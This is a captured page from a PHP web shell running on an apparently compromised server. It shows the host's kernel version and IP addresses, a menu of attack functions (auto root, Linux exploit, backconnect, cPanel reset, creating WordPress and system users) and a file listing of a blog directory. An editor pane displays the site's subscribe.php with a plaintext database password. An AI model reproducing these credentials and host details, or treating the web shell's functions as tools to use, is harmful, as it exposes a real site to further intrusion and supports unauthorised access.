Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.191.28.200
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
itailorBlog /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
theme
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxr-xr-x
.htaccess
903
B
-rw-r--r--
auth.php
1.1
KB
-rw-r--r--
blog-cat.php
7.22
KB
-rw-r--r--
blog-single.php
10.8
KB
-rw-r--r--
category.php
2.53
KB
-rw-r--r--
index.html
131
B
-rw-r--r--
index.php
9.17
KB
-rw-r--r--
post.php
4.73
KB
-rw-r--r--
subscribe.php
1007
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : subscribe.php
<?php require_once "includes/start.php"; ?> <?php require_once "includes/config.php"; ?> <?php if ($_SERVER["REQUEST_METHOD"] === "POST") { $connection = mysqli_connect('localhost', 'dpclient_itailor', 'dAm#VbbjzoYxdAm#VbbjzoYxdAm#VbbjzoYxdAm#VbbjzoYx', 'dpclient_itailor'); $email = mysqli_real_escape_string($connection, cleanVal($_POST['email'])); $ru = mysqli_real_escape_string($connection, cleanVal($_POST['ru'])); $hashemail = cleanVal($email); $hashru = hashed($ru, 'd') . '?success'; $status = 'optin'; $added = date('Y-m-d H:i:s'); if (subscriberCheck($hashemail) == false) { $sql = "INSERT INTO subscribers (email, status, added) VALUES ('$email', '$status', '$added')"; mysqli_query($connection, $sql); } mysqli_close($connection); header("location: $hashru"); } else { mysqli_close($connection); $bu = base_url(); header("location: $bu"); } ?> <?php require_once "includes/end.php"; ?>
Close